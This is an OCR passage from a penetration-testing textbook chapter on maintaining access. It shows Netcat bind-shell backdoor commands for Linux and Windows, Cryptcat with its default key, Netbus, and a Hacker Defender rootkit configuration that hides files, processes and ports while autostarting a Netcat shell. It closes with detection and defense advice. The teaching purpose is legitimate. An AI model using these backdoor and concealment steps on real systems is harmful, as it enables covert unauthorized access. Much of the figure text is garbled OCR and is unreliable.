9619scanning process you discover that port 50001 is open. Unfortunately, nei-
9620ther your port scanner nor your vulnerability scanners were able to determine
9621what service was running behind the report. In this case, it can be handy to use
9622Netcat to interact with the unknown service. To force Netcat to attempt a con-
9623nection to the service, we simply enter the following command:
9624
9625nc 172.16.45.129 50001
9626
9627This command will attempt to create a TCP connection to the port and service.
9628It is important to note that you can force Netcat to send UDP packets by issu-
9629ing the "-u" switch. Once the connection is made in most cases it is easiest to
9630simply enter some text and hit return key to send the text to the service. If the
9631service responds to the unexpected request, you may be able to derive its func-
9632tion. Figure 6.3 shows an example of this.
9633
9634As you can see, we used Netcat to create a connection to port 50001. Once con-
9635nected, the text "test" was sent through the connection. The service returned
9636with a response that clearly indicates that the mysterious service is a web server.
9637
9638
9639
9640The Basics of Hacking and Penetration Testing
9641
9642
9643
9644And even more important, the server has fully identified itself as an Apache
9645server running version 2.2.9 on a Linux Ubuntu machine!
9646
9647Finally, we can use Netcat to bind itself to a process and make that process
9648available over a remote connection. This allows us to execute and interact
9649with the bound program as if we were sitting at the target machine itself. If we
9650start Netcat using the "-e" switch, it will execute whatever program we specify
9651directly after the "-e. " The program will execute on the target machine and will
9652only run once a connection has been established. The "-e" switch is incredibly
9653powerful and very useful for setting up a backdoor shell on a target.
9654
9655To set up a backdoor, we will need to utilize the "-e" switch to bind a com-
9656mand shell from the target machine to a port number. By setting up Netcat in
9657this manner, later when we initiate a connection to the specified port, the pro-
9658gram listed after the "-e" switch will run. If we are using a Linux machine, we
9659can accomplish this by typing the following into a terminal window:
9660
9661nc -1 -p 12345 -e /bin/sh
9662
9663This will cause the target to serve up a shell to whoever connects to port 12345.
9664Again, any commands sent from the Netcat client to the target machine will be
9665executed locally as if the attacker were sitting at the target.
9666
9667This technique can also be used on a Windows machine. To provide command
9668line backdoor access into a Windows machine, we would run the following on
9669the target (in a terminal window) :
9670
9671nc.exe -L -p 12345 c:\Windows\System32\cmd.exe
9672
9673To put the preceding example into context and hopefully make it more con-
9674crete for you, let us examine the following scenario to show how we could
9675implement Netcat as a backdoor. Consider the following example: assume that
9676we have successfully exploited a Windows target. Being forward-thinking pen-
9677etration testers, we decide to create a more stable backdoor to this system so
9678that we can return later. In this case, we have decided to use Netcat as our back-
9679door software.
9680
9681The first order of business would be to upload Netcat to the target machine; in
9682this example, the Netcat executable has been uploaded to the target's System32
9683directory. Let us assume that we utilized the knowledge gained from Chapter
96844 and we are currently using the Meterpreter shell to interact with our target.
9685
9686
9687
9688ALERT!
9689
9690
9691
9692Notice, because this is a Windows machine, we are using the "-L" switch to make
9693our connection persistent. If we close the connection from our machine, Netcat wil
9694continue listening on the specified port. The next time we connect to the machine,
9695the cmd shell will be waiting and will execute for us.
9696
9697
9698
9699Maintaining Access with Backdoors and Rootkits CHAPTER 6
9700
9701
9702
9703rootvbt : "8
9704rootebt :~M
9705
9706root»bt:~» nc 172 . 16 . 45 . 131 43210
9707Microsoft Uindous lUersiOS 6. 1 .7606 J
9708
9709Copyright <c) 2008 Microsoft Corporation. All rights reserved,
9710c :\H i ndous\System32>_
9711
9712
9713
9714FIGURE 6.4
9715
9716Using Netcat as a Backdoor on a Windows Machine.
9717
9718Once we have a Meterpreter shell on our target, we can upload the Netcat file
9719to the victim by issuing the following command:
9720
9721meterpreter > upload nc.exe c : Wwi ndows\\system32
9722
9723Note: You will need to upload the Windows (.exe) version of Netcat because
9724the target is running Windows.
9725
9726In this case, we have uploaded the nc.exe program to the Windows\System32
9727directory. This will allow us to access the cmd.exe program directly. Once
9728Netcat has been transferred to the target machine, we need to choose a port
9729number, bind the cmd.exe program, and start Netcat in server mode. This
9730will force Netcat to wait for an incoming connection on the specified port. To
9731perform these tasks, we need to issue the following command in a terminal
9732(again, assuming you are already in the same directory as Netcat).
9733
9734meterpreter >nc -L -p 5777 -e cmd.exe
9735
9736At this point, Netcat should be running on our target machine. Remember if
9737you were interested in making this backdoor truly persistent, with the ability to
9738survive a reboot, you would need to set the Netcat command to automatically
9739start in the Windows registry.
9740
9741Now that Netcat is set up, we can close our Meterpreter shell and make a connec-
9742tion to the target using Netcat. Figure 6.4 shows an example of a connection we
9743have made from our local Backtrack machine to the target Windows machine.
9744
9745There should be little doubt in your mind that Netcat is a truly powerful and
9746flexible tool. In this section we have barely scratched the surface. If you take
9747some time to dig deeper into the program, you will find that people have been
9748able to perform some rather amazing things using Netcat. You are encouraged
9749to look into some of these clever implementations by searching the web, the
9750results will amaze you.
9751
9752NETCAT'S CRYPTIC COUSIN: CRYPTCAT
9753
9754/Although Netcat provides some amazing qualities, the program does have a
9755few shortcomings. First off, it is important to understand that all traffic passed
9756between a Netcat client and server is done so in clear text. This means that any-
9757one viewing traffic or sniffing the connection will be able to view and monitor
9758
9759
9760
9761The Basics of Hacking and Penetration Testing
9762
9763
9764
9765rootebt :~tt
9766
9767
9768
9769
9770roo i 91) 1 : II
9771
9772
9773rootPbt:"*
9774
9775
9776
9777
9778rootebt
9779
9780
9781rDotGbt:~ft cryptcat -1
9782
9783
9784-p S7S7
9785
9786
9787rootebt:~* cryptcat 172 . 1£> .45 . 129 575?
9788
9789
9790Sniffing this traffic
9791
9792
9793is futile
9794
9795
9796Sniffing this traffic is futtle
9797
9798
9799-
9800
9801
9802
9803
9804-
9805
9806
9807
9808FIGURE 6.5
9809
9810Using Cryptcat to Create an Encrypted Tunnel between Two Machines.
9811
9812
9813
9814all the information sent between the machines. Cryptcat was introduced
9815to address this issue. Cryptcat utilizes twofish encryption to keep the traffic
9816between the client and the server confidential.
9817
9818The beauty of Cryptcat is that you do not need to learn any new commands.
9819If you have already mastered Netcat, then you have already mastered Cryptcat;
9820but with Cryptcat you have the added benefit of transporting your data using
9821an encrypted tunnel. Anyone viewing or analyzing your network traffic will not
9822be able to see your information.
9823
9824One important note about Cryptcat, you should always change the default key.
9825If you fail to change the default key, anyone will have the ability to decrypt your
9826session. The default key is: metallica and can be changed using the "-k" switch.
9827
9828To set up an encrypted tunnel between two machines using Cryptcat, you can
9829issue the following commands:
9830
98311) Start the server:
9832
9833cyrptcat -1 -p 5757
9834
98352) Start the client:
9836
9837cryptcat 172.16.45.129 5757
9838
9839You now have an encrypted tunnel set up between the two machines. Figure 6.5
9840shows an example of this process.
9841
9842NETBUS: A CLASSIC
9843
9844Netbus is a classic piece of software that has been around since 1998. We will
9845briefly review it here as a gentle introduction to backdoors and remote control
9846software. Netbus was originally written by Carl-Fredrik. The program consists
9847of two parts: a client and a server. The server software is installed on the target
9848PC, that is, the machine that you want to remotely control. The client software
9849is used to connect and control the target.
9850
9851Once the Netbus server software is installed on the target machine, the client
9852software can perform a number of different actions on the target. Remember,
9853even though the attacker is not physically sitting at the local machine, the cli-
9854ent software allows the attacker to execute commands on the remote target as if
9855he were. Some of the more popular options include the following:
9856
9857â– opening the CD-Rom drive;
9858
9859â– starting a program;
9860
9861
9862
9863Maintaining Access with Backdoors and Rootkits CHAPTER 6
9864
9865
9866
9867§ NetBui T. 70, by el
9868
9869
9870
9871
9872Be.®
9873
9874
9875— <
9876
9877
9878
9879
9880
9881
9882Op*nCU-ftOM |
9883
9884
9885
9886
9887
9888
9889
9890
9891M.-.„i.. n--rir stJ.i:
9892
9893
9894SwipnHiiM | PttlRdftttl | App-EtalrMl | Swrwf MtUp |
9895
9896
9897SUrt progum
9898
9899
9900PIjiv â– .uinnl
9901
9902
9903
9904
9905
9906
9907£xH WnNh>A3 1
9908
9909
9910MOM*?pO? 1 Goto URL 1
9911
9912
9913
9914
9915
9916
9917
9918
9919
9920
9921Gel Into
9922
9923
9924Acllv* wndt |
9925
9926
9927Sound •yalam | Fhmm*e*r j
9928
9929
9930
9931
9932
9933
9934
9935
9936
9937FIGURE 6.6
9938
9939Netbus Client Software Used to Remotely Control the Target.
9940
9941â– taking a screenshot of the target's current screen;
9942
9943â– uploading and downloading files;
9944
9945â– sending messages.
9946
9947To use Netbus, simply install the server on the target machine and run the cli-
9948ent software on the attacker machine.
9949
9950Netbus comes as a compressed file that contains several different pieces. You
9951need to first unzip the Netbus file. To install the server software, you will need
9952to execute the patch.exe file on the target. This installs and starts Netbus. The
9953program will run as a process called "patch.exe" and when installed, will auto-
9954matically create a registry entry so that it starts every time Windows is started.
9955
9956To access the client panel you run the NetBus.exe. Enter the target IP address
9957in the "Host name/IP:" field and click the connect button. Figure 6.6 shows an
9958example of the client interface that is used to interact with the target.
9959
9960There is little doubt that Netbus is an old piece of software, but it makes for a
9961great tool when discovering and exploring backdoor command and control of
9962a remote target.
9963
9964ROOTKITS
9965
9966Just like Metasploit, when people are first exposed to the power and cunning of
9967rootkits, they are usually amazed. To the uninitiated, rootkits appear to have an
9968almost black-magic-like quality. They are usually simple to install and can pro-
9969duce amazing results. Running a rootkit gives you the ability to hide files, pro-
9970cesses, and programs as if they were never installed on the computer. Rootkits
9971can be used to hide files from users and even the operating system itself.
9972
9973Because rootkits are so effective at hiding files, they will often be successful
9974at evading even the most finely tuned antivirus software. The name rootkit is
9975typically said to be a derivative of the words "root," as in root-level or admin-
9976istrative access, and the "kit" or collection of tools that were provided by the
9977software package.
9978
9979
9980
9981The Basics of Hacking and Penetration Testing
9982
9983
9984
9985ALERT!
9986
9987
9988
9989As with everything else and even more so in this case, you must be 100 percent sure
9990that your client authorizes the use of rootkits before you deploy them in a penetration
9991test. Utilizing a rootkit without authorization will be a sure way to quickly end your
9992career and put you behind bars. Even if you have been fully authorized to conduct a
9993penetration test, double and triple check that you are specifically authorized to utilize
9994a rootkit.
9995
9996
9997
9998As we already mentioned, rootkits are extremely stealthy. They can be used
9999for a variety of purposes including escalating privileges, recording keystrokes,
10000installing backdoors, and other nefarious tasks. Many rootkits are able to avoid
10001detection because they operate at a much lower level of the operating system
10002itself, inside the kernel. The software that users typically interact with, func-
10003tions at a higher level of the system. When a piece of software like antivirus
10004needs to perform a particular task, it will often pass the request off to the lower
10005levels of the operating system to complete the task. Remember, some rootkits
10006live deep inside the operating system. They can also work by "hooking" or
10007intercepting these various calls between the software and operating system.
10008
10009By hooking the request from a piece of software, the rootkit is able to modify
10010the normal response. Consider the following example: assume that you want
10011to see what processes are running on a Windows machine. To accomplish this,
10012most users will depress the key combination "CNTL+ALT+DEL." This will
10013allow the user to start the Task Manager and view running processes and ser-
10014vices. Most people perform this task without thinking about it. They examine
10015the process list presented and move on.
10016
10017While the following is a gross oversimplification, it should serve as an example
10018to help you understand the basics. In this case software is making a call to the
10019operating system and asking what processes or services are running. The oper-
10020ating system queries all the running programs it is aware of and returns the
10021list. However, if we add a rootkit to the mix, things get a little more compli-
10022cated. Because rootkits have the ability to intercept and modify the responses
10023returned by the operating system, when a user attempts to view the process list,
10024the rootkit can simply remove selected programs, services, and processes from
10025the list. This happens instantaneously and the user is not aware of any differ-
10026ences. The program itself is actually functioning perfectly. It is reporting exactly
10027what it was told by the operating system. In many senses of the word, the root-
10028kit is causing the operating system to lie.
10029
10030It is important to point out that a rootkit is not an exploit. Rootkits are some-
10031thing that is uploaded to a system after the system has been exploited. Rootkits
10032are usually used to hide files or programs and maintain stealthy backdoor
10033access.
10034
10035
10036
10037Maintaining Access with Backdoors and Rootkits CHAPTER 6
10038
10039
10040
10041Hacker Defender: It Is Not What You Think
10042
10043First things first; do not let the name fool you, Hacker Defender is a rootkit. It
10044is NOT a way to defend hackers! Hacker Defender is a full-fledged rootkit that
10045is relatively easy to understand and configure.
10046
10047There are three main files included with Hacker Defender that you must be
10048aware of: hxdeflOO.exe, hxdeflOO.ini, and bdclilOO.exe. Although the .zip
10049file will include several other files, we will focus our attention on these three.
10050HxdeflOO.exe is the executable file that runs Hacker Defender on the target
10051machine. HxdeflOO.ini is the configuration file where we set up the options
10052we want to use and list the programs, files, or services that we want to hide.
10053BdclilOO.exe is the client software that is used to connect directly to Hacker
10054Defender's backdoor.
10055
10056Once you have uploaded the hsdeflOO.zip file to your target, you will need to
10057unzip it. To keep things as simple as possible, it is best to create a single folder
10058on the root of the target drive. For the purpose of this example, we will create
10059a folder on the C:\ drive called "rk" (for rootkit). All the files including the
10060hxdeflOO.zip and its uncompressed contents are placed into this single folder.
10061This will make it easier to keep track of the files, provide a central location
10062to upload additional tools to, and make hiding this central repository much
10063easier. Once you have unzipped the hxdeflOO file, you can begin configuring
10064Hacker Defender by modifying the hxdeflOO.ini file.
10065
10066Once you open the .ini file, you will see a number of different sections. Each
10067major section begins with a name enclosed in a square bracket. Figure 6.7
10068shows an example of the default configuration file.
10069
10070
10071
10072JhndeflOO - Notcp ad
10073
10074
10075
10076File Edit Format View Help
10077
10078[[Hidden Table]
10079hxdef *
10080rcrnd. exe
10081
10082[Hidden Processes]
10083
10084hxdef*
10085
10086rcrnd. exe
10087
10088[root Processes]
10089
10090hxdef*
10091
10092rcmd. exe
10093
10094[Hidden services]
10095Hacker Defender"
10096
10097[Hidden RegKeys]
10098Hacker DefenderlQO
10099
10100L EG ACY_H ACK E R D EF E ND ER1 00
10101
10102Hack er Defender DrvlQO
10103
10104L EG AC Y_H ACK E RO E F E N D ER DR VI 0 0
10105
10106
10107
10108FIGURE 6.7
10109
10110Screenshotof the hxdeflOO.ini Configuration File.
10111
10112
10113
10114The Basics of Hacking and Penetration Testing
10115
10116
10117
10118As you can see in Figure 6.7, there are several headings including [Hidden
10119Table], [Hidden Processes], [Root Processes], [Hidden Services], and others.
10120You will also notice that Hacker Defender configuration file includes a cou-
10121ple of default entries. These entries are used to hide the Hacker Defender files
10122and built in backdoor so you do not have to modify these or make additional
10123changes. Notice too that the .ini file supports the use of wildcards with the "*"
10124character. In this case, any file that starts with the letters hxdef will automati-
10125cally be included in the list.
10126
10127Start at the top and work your way through each of the headings. The first sec-
10128tion is titled [Hidden Table]. Any files, directories, or folders listed under this
10129heading will be hidden from the explorer and file manager used by Windows.
10130If you created a folder on the root of the drive as suggested earlier, be sure
10131to list it here. Building off of this previous example, we will list "rk" in the
10132[Hidden Table] section.
10133
10134In the [Hidden Processes] section, you list each of the processes or programs
10135you want to be concealed from the user. Each of the processes listed here will
10136be hidden from the local user when they view currently running processes with
10137the task manager. As a nonmalicious example assume you want to hide the cal-
10138culator program. In this case you will need to list the calculator program under
10139the [Hidden Processes] section. By adding calc.exe to the [Hidden Processes]
10140section, the user will no longer be able to find or interact with the calculator
10141program. Once our rootkit is started, as far as the user is concerned, there is no
10142calculator program available on the computer.
10143
10144The [Root Processes] section is used to allow programs to interact with and
10145view the previously hidden folders and processes. Remember that in the pre-
10146vious sections we were removing the computer's ability to detect, see, and
10147interact with various files and programs. In this section, we list any programs
10148that we want to have full control. Any programs listed here will be allowed to
10149view and interact with programs on the system, including those listed in the
10150[Hidden Table] and [Hidden Processes] tab.
10151
10152If you have any programs that will install as a service or run services like FTP,
10153web servers, backdoors, etc., you will need to list them in the [Hidden Services]
10154section. Like each of the other sections, the [Hidden Services] section will hide
10155each of the listed services. Again, when interacting with the task manager, any
10156program listed here will be concealed from the "services" list.
10157
10158You can use the [Hidden RegKeys] to hide specific registry keys. Almost all pro-
10159grams create registry keys when they are installed or run on a computer. The
10160[Hidden RegKeys] section can be used to camouflage each of these keys. You
10161will need to make sure that you list them all in order to avoid detection.
10162
10163Some instances require more granular control than simply hiding the entire
10164key. If an entire key is missing (or hidden), a keen system administrator may
10165get suspicious. To handle these instances, Hacker Defender allows us to use
10166
10167
10168
10169Maintaining Access with Backdoors and Rootkits CHAPTER 6
10170
10171
10172
10173the [Hidden RegValues]. Entering information here will hide individual values
10174rather than the entire key.
10175
10176The [Startup Run] is a list of programs that will be automatically run once
10177Hacker Defender has been started. This would be a good place to list the
10178Netcat command if you were interested in creating a backdoor. Just make sure
10179you put it in listener mode!
10180
10181Just as installing programs on a Windows machine automatically creates regis-
10182try keys and values, installing programs onto a target requires disk drive space.
10183Here again, a cunning administrator may notice if you install a program that
10184requires lot of disk space. If a user starts his or her computer one morning and
10185discovers that over half of the hard drive space is suddenly in use, he or she
10186will probably become suspicious. You can use the [Free Space] section to force
10187the computer to "add back" the amount of free space that you used. Entering
10188a number here will force the computer to report the actual available free space
10189plus the number you enter in this section. In other words, if you install a pro-
10190gram that requires 1 GB of free space, you should add 1073741824 under the
10191[Free Space] heading. Doing so will lessen the likelihood of discovery. Please
10192note, this number is listed in bytes. If you need help in converting from bytes
10193to kilobytes to megabytes to gigabytes, there are several good calculators avail-
10194able online. Simply Google "kilobytes to megabytes calculator" and use one of
10195the suggested pages returned.
10196
10197If you know of ports that you plan to open, you can list them under the
10198[Hidden Ports] section. You will notice this section is further divided with the
10199following entries: TCPI:, TCPO, UDP The "TCPI:" subsection is where you list
10200any inbound ports that you want hidden. If you have multiple ports to list,
10201simply separate them by a comma. "TCPO:" is a section where you list any out-
10202bound TCP ports that you want to be hidden from the user. The "UDP:" sec-
10203tion is used to specify any UDP ports that you want concealed.
10204
10205Now that you have an idea of how to configure the basic Hacker Defender
10206settings, let us examine the tool in action. For this example, we will install
10207Hacker Defender in a folder on the C:\ drive called "rk." We will also place a
10208copy of Netcat into this folder. Figure 6.8 shows an example of the .ini configu-
10209ration file.
10210
10211You will notice that only a few extra lines have been added to the default
10212configuration file. In this example, we have added the "rk" folder to the
10213[Hidden Table] section, the Netcat executable to the [Hidden Processes] sec-
10214tion, and lastly set up Netcat to automatically start up in server mode and
10215provide a cmd shell on port 8888 of the target. If you wanted to add an
10216additional layer of stealth, you could also add 8888 to the [Hidden Ports]
10217section.
10218
10219Figure 6.9 shows two screenshots prior to starting Hacker Defender. Notice that
10220both the "rk" folder and the Netcat (nc.exe) program are visible.
10221
10222
10223
10224The Basics of Hacking and Penetration Testing
10225
10226
10227
102281 fjhxclfFmO Notepad
10229
10230
10231
10232
10233Re Ed* F&rrnat Vhsw Help
10234
10235
10236
10237
10238f H i fi H &j"i Tahiti
10239
10240hxdef
10241rcmd. exe
10242rk
10243
10244
10245
10246
10247[Midden Processes]
10248hxdef
10249rcmd. exe
10250nc.exe
10251
10252
10253
10254
10255[Root Processes]
10256
10257hxdef"
10258
10259rcmd. exe
10260
10261
10262
10263
10264[Hidden services]
10265Hack erOef end er*
10266
10267
10268
10269
10270[Hidden RegKeys]
10271Hack eroef end enoo
10272
10273L EG AC V_HAC KE R DE F ENDE R10Q
10274
10275Hack erDef end erDrvlOO
10276
10277LEGAC Y_HAC KE R DE F ENDER DR V1O0
10278
10279
10280
10281
10282[Hidden Regvalues]
10283
10284
10285
10286
10287[Startup Run]
10288
10289c:\rk\nclllnt\nc.exe -L -p S88S
10290
10291
10292-e c:\windows\system52\cmd.exe]
10293
10294
10295
10296FIGURE 6.8
10297
10298Newly Configured hxdef100.ini File.
10299
10300
10301
10302
10303_ . Win ill i 1 .Y'.k M.hi.iiJi;t
10304
10305
10306
10307-10 XJ
10308
10309
10310
10311He OpUora wh> H-b
10312
10313
10314
10315Urn*
10316
10317
10318
10319
10320CPU
10321
10322
10323MMn«V(...
10324
10325
10326D«tnpt«n
10327
10328
10329
10330
10331cmd.esee
10332
10333
10334My
10335
10336
1033700
10338
10339
10340572K
10341
10342
10343v;?vl..v, ...
10344
10345
10346
10347
10348
10349
10350DSJ
10351
10352
10353DO
10354
10355
10356552K
10357
10358
10359cwrafe...
10360
10361
10362
10363
10364
10365
10366DSU
10367
10368
10369no
10370
10371
103722Mi:
10373
10374
10375Csojde...
10376
10377
10378
10379
10380esrss.***
10381
10382
10383
10384
1038500
10386
10387
10388
10389
10390
10391
10392
10393
10394
10395
10396MU
10397
10398
10399go
10400
10401
10402216 It
10403
10404
10405DtsHop...
10406
10407
10408
10409
10410
10411
10412BSU
10413
10414
1041500
10416
10417
1041822.9I2K
10419
10420
10421Wn&Vfl ...
10422
10423
10424
10425
10426
10427
10428
10429
10430
10431
10432ijor
10433
10434
10435Jm(IM)...
10436
10437
10438
10439
10440
10441
10442DSJ
10443
10444
1044500
10446
10447
10448
10449
10450â– iBHtlH)...
10451
10452
10453
10454
10455
10456
10457b;
10458
10459
1046000
10461
10462
10463
10464
10465
10466
10467
10468
10469
10470
10471
10472
10473
10474
10475
10476
10477Windows ...
10478
10479
10480
10481
10482
10483
10484DSU
10485
10486
10487DO
10488
10489
10490S»C
10491
10492
10493Win..,
10494
10495
10496
10497
10498
10499
10500OSU
10501
10502
1050300
10504
10505
10506l,463X
10507
10508
10509Window!...
10510
10511
10512
10513
10514VMw jj e Tr jv .-j kg
10515
10516
10517DSU
10518
10519
10520Ml
10521
10522
1052352*1!
10524
10525
10526VfrWe T...
10527
10528
10529
10530
10531
10532
10533PS.
10534
10535
10536DO
10537
10538
105392.93JX
10540
10541
10542
10543
10544
10545
10546
10547
10548
10549
1055000
10551
10552
10553
10554
10555
10556
10557
10558FIGURE 6.9
10559
10560Prior to Running the Rootkit Both Folder and Program Are Visible.
10561
10562
10563
10564However, once the hxdefl00.exe file has been executed, the rootkit is in full
10565force. Figure 6.10 demonstrates that neither the "rk" folder nor the "nc.exe"
10566program is visible to the user.
10567
10568As you can see, even a simple rootkit like Hacker Defender is quite capable of
10569masking and hiding files. Rootkits are a vast topic and we could easily dedicate
10570
10571
10572
10573Maintaining Access with Backdoors and Rootkits CHAPTER 6
10574
10575
10576
10577L. - Computer - LoctfOtsMC:) •
10578' Open Jhduoeinifxjfy
10579
10580
10581
10582£rv;.r>-* : ? fig
10583it PjtylOl
10584
10585it Ultff
10586
10587
10588
10589/Wrinli;iim\ 1 i-rsk M.ni.Hjrr
10590
10591
10592
10593.101*1
10594He Opboni fc. Hcb
10595
10596iKkatos (tocsssK | ShvIck | Pafomantt | mviBbn) | Ushi |
10597
10598
10599
10600JfTM&S... *
10601
10602
10603
10604
10605l CPU
10606
10607
10608HCAiorv(... 1 DiKtnptwn j
10609
10610
10611
10612
10613
10614
10615L v
10616
10617
1061800
10619
10620
10621'â– . ?: t
10622
10623
10624wmoews .-,
10625
10626
10627
10628
10629
10630
10631pss
10632
10633
1063400
10635
10636
10637552 K
10638
10639
10640comcte ...
10641
10642
10643
10644
10645
10646
10647DSU
10648
10649
1065000
10651
10652
106532WK
10654
10655
10656Console...
10657
10658
10659
10660
10661csfss.evs
10662
10663
10664
10665
10666x
10667
10668
10669
10670
10671
10672
10673
10674
10675
10676
10677WU
10678
10679
10680(u
10681
10682
10683216 K
10684
10685
10686l>5»iop,..
10687
10688
10689
10690
10691
10692
10693f:
10694
10695
10696OB
10697
10698
1069922,912 X
10700
10701
10702wndcvri ...
10703
10704
10705
10706
10707
10708
10709MU
10710
10711
10712DO
10713
10714
10715
10716
10717J«v*(TM)...
10718
10719
10720
10721
10722
10723
10724
10725
1072600
10727
10728
10729120 K
10730
10731
10732
10733
10734
10735
10736
10737
107386su
10739
10740
10741so
10742
10743
10744736 K
10745
10746
10747
10748
10749
10750
10751
10752
10753Q$U
10754
10755
10756w
10757
10758
10759
10760
10761WAfottS ...
10762
10763
10764
10765
10766tasVhost.e-re
10767
10768
10769C'."-.
10770
10771
1077200
10773
10774
10775836 .K
10776
10777
10778Host Proc
10779
10780
10781
10782
10783
10784
10785DAI
10786
10787
10788oc
10789
10790
10791
10792
10793Windows ...
10794
10795
10796
10797
10798VMwar eTr ay . exc
10799
10800
10801DSU
10802
10803
1080400
10805
10806
1080752H >
10808
10809
10810VfrW-arc 7.. .
10811
10812
10813
10814
10815
10816
10817
10818
10819DC
10820
10821
108222>902K
10823
10824
10825
10826
10827•
10828
10829
10830
10831
10832
10833
1083400
10835
10836
108377061:
10838
10839
10840
10841
10842
10843
10844-615 |
10845
10846
10847
10848
10849
10850
10851
10852
10853
10854cpuumq*: o%
10855
10856
10857
10858FIGURE 6.10
10859
10860After Running the Rootkit Both Folder and Program Are Invisible.
10861
10862
10863
10864an entire book to the technical details and their makeup and inner workings.
10865Rootkit technology, like all malware, continues to develop at a staggering pace.
10866In order to truly master rootkits you will need to begin with a solid under-
10867standing of the operating system kernel. Once you finish covering the basics,
10868you are highly encouraged to dive into the malware rabbit hole and see just
10869how deep it goes.
10870
10871DETECTING AND DEFENDING AGAINST ROOTKITS
10872
10873Let us break from the normal convention of this book and take a minute to
10874discuss a few defensive strategies for dealing with rootkits. Because we are
10875focusing on the basics, defending against many of the techniques covered in
10876the earlier step has been quite simple:
10877
10878â– Closely monitor the information you put onto the Internet.
10879
10880â– Properly configure your firewall and other access control lists.
10881
10882â– Patch your systems.
10883
10884â– Install and use antivirus software.
10885
10886â– Make use of an intrusion detection system.
10887
10888Although the list is not nearly complete, it is a good starting point for defend-
10889ing systems. However, even with all of those processes in place, rootkits can
10890still pose a danger.
10891
10892Defending against and detecting rootkits takes a few extra steps. It is impor-
10893tant to understand that in order to configure and install a rootkit, adminis-
10894trative access is required. So the first step in avoiding rootkits is to deprivilege
10895your users. It is not uncommon to find networks that are loaded with Windows
10896
10897
10898
10899The Basics of Hacking and Penetration Testing
10900
10901
10902
10903machines where every user is a member of the administrator group. Usually
10904when inquiring as to why every user is an administrator, the system admins sim-
10905ply just shrug or provide some lame excuse about the user needing to be admin-
10906istrators to run a particular piece of software. Really? Come on, this is not 1998.
10907There are very few legitimate reasons for allowing your users to run around with
10908full admin rights. With most modern operating systems, you have the ability to
10909temporarily elevate your privileges with the "su" or "Run As" commands.
10910
10911Although it is true that many roofkits function at the kernel level and have the
10912ability to avoid detection by antivirus software, installing, using, and keeping the
10913software up-to-date is critical. Some roofkits, especially the older and less sophis-
10914ticated versions can be detected and cleaned by modern antivirus software.
10915
10916Monitor the traffic coming into and going out of your network. Many adminis-
10917trators are great at monitoring and blocking traffic as it flows into the network.
10918They spend days and even weeks honing their rule sets to block incoming traf-
10919fic. At the same time, many of these admins completely ignore all outbound
10920traffic. They become so focused on the incoming traffic that they forget to
10921watch what is leaving. Monitoring outbound traffic can be vital in detecting
10922rootkits and other malware.
10923
10924Another good tactic for detecting rootkits and backdoors is to regularly port
10925scans your systems. Make note of each open port on each of your systems. If
10926you find a system with an unknown port open, be sure to track down the PC
10927and identify the rogue service.
10928
10929Tools like Rootkit Revealer, Vice, and F-Secure's Blacklight are some great free
10930options for revealing the presence of hidden files and rootkits. Unfortunately,
10931once a rootkit has been installed, it can be very difficult to remove, or at least
10932to remove completely. Sometimes, rootkit removal requires you to boot your
10933machine into an alternate operating system and mount your original hard
10934drive. By booting your machine to an alternate operating system or mounting
10935the drive to another machine, you can scan the drive more thoroughly. Because
10936the original operating system will not be running and your scanner will not be
10937using API calls to an infected system, it is more likely you will be able to dis-
10938cover and remove the rootkit. Even with all of this, oftentimes your best bet is
10939to simply wipe the system, including a full format, and start over.
10940
10941HOW DO I PRACTICE THIS STEP?
10942
10943Like each of the steps that have been discussed, becoming proficient with
10944backdoors and rootkits requires practice. Working with tools like Netcat can
10945seem a bit confusing at first, especially when we use the "-e" switch to provide
10946backdoor functionality. The best way to practice this technique is to set up two
10947machines and practice implementing Netcat between them. The more you use
10948Netcat, the more comfortable you will become with the concept.
10949
10950You should practice both sending and receiving files from each machine. It
10951is important to understand directionality and exactly how to use Netcat to
10952
10953
10954
10955Maintaining Access with Backdoors and Rootkits CHAPTER 6
10956
10957
10958
10959perform this task both ways (download and uploading). Once the basics of
10960sending and receiving files have been mastered, begin focusing on using Netcat
10961as a backdoor. Remember the "-e" switch is vital in performing this task. Fully
10962understanding how to implement Netcat as a backdoor will require setting up
10963the tool in listener mode on the target and making a connection to it from the
10964attacker machine.
10965
10966Be sure to practice setting up a backdoor and establishing a connection with
10967both Linux and Windows. It is important to master the difference between the
10968Linux and Windows versions. Remember, a Windows Netcat version can con-
10969nect to a Linux version and vice versa; however, there are several minor differ-
10970ences in the switches and functionality of each program.
10971
10972Finally, after becoming proficient with the basics of Netcat, be sure to explore
10973some advanced features like using Netcat as a proxy, reverse shells, port scan-
10974ning, creating and copying a disk partition image, and chaining Netcat instances
10975together to bounce traffic from one machine to another.
10976
10977Before wrapping up Netcat, be sure to thoroughly review the "man" pages and
10978examine each switch. Again, you will want to look closely at the differences
10979between the Linux and Windows versions. Examining the switches and reading
10980the "man" pages often provides additional information and can spur some cre-
10981ative uses of the tool.
10982
10983Practicing with rootkits can be a bit of a double-edged sword. Exploring and
10984learning to use rootkits can be rewarding and valuable but as with all malware
10985there is certainly some risk involved. Anytime malware is used or studied, there
10986is a chance that the malware will escape or infect the host system. Readers are
10987strongly encouraged to exercise extreme caution before downloading or install-
10988ing any type of malware. Advanced malware and rootkit analysis is beyond the
10989scope of this book and is not recommended.
10990
10991If you are still compelled to study these topics, the use of a sandboxed envi-
10992ronment and virtual machines is a must. Always disconnect all outside access
10993before proceeding to ensure that nothing escapes your network. Remember
10994that you are legally responsible for any and all traffic that leaves your network.
10995The laws that govern computer use at the federal and state levels make no dis-
10996tinction between traffic that "accidentally" leaves your network and traffic that
10997is sent on purpose.
10998
10999In reality, rootkits and backdoors are rarely used in a penetration test. It is
11000highly suggested that you focus on mastering each of the other steps before
11001attempting to advance any further with malware.
11002
11003WHERE DO I GO FROM HERE?
11004
11005After mastering the basics of backdoors and rootkits, you should expand your
11006horizon by exploring similar tools including Neat and Socat. Neat is a modern-
11007ized version of the original Netcat tool and is included as part of the Nmap
11008
11009
11010
11011The Basics of Hacking and Penetration Testing
11012
11013
11014
11015project. Neat improves on the original tool by including many of the original
11016features plus SSL and IPv6 support. Socat is another close Netcat relative that
11017is great for reading and writing network traffic. Socat also extends the origi-
11018nal functionality of Netcat by adding support for SSL, IPv6, and several other
11019advanced features.
11020
11021If you are interested in learning more about backdoors, you should spend time
11022exploring a couple of classic examples including Back Orifice and SubSeven
11023(Sub7). Back Orifice is similar in nature to Netbus and allows a user to com-
11024mand and control a remote machine. The program was originally released
11025by Sir Dystic in 1998. You can listen to the original talk titled "Cult of the
11026Dead Cow: The announcement of Back Orfice, DirectXploit, and the modular
